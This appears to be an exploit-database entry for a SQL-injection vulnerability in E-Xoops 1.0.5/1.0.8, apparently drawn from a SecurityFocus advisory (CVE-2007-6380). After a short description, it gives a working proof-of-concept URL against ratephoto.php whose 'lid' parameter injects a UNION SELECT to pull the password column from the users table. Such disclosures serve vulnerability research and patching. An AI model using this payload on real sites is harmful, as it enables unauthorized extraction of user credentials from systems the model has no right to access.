E-Xoops 1.0.5/1.0.8 - '/myalbum/ratephoto.php?lid' SQL Injection
Author: Lostmon type: webapps platform: php port: date_added: 2007-12-10 date_updated: 2014-01-13 verified: 1 codes: CVE-2007-6380;OSVDB-43683 tags: aliases: screenshot_url: application_url: raw file: 30873.txt
source: https://www.securityfocus.com/bid/26796/info E-Xoops is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/e-xoops/modules/myalbum/ratephoto.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201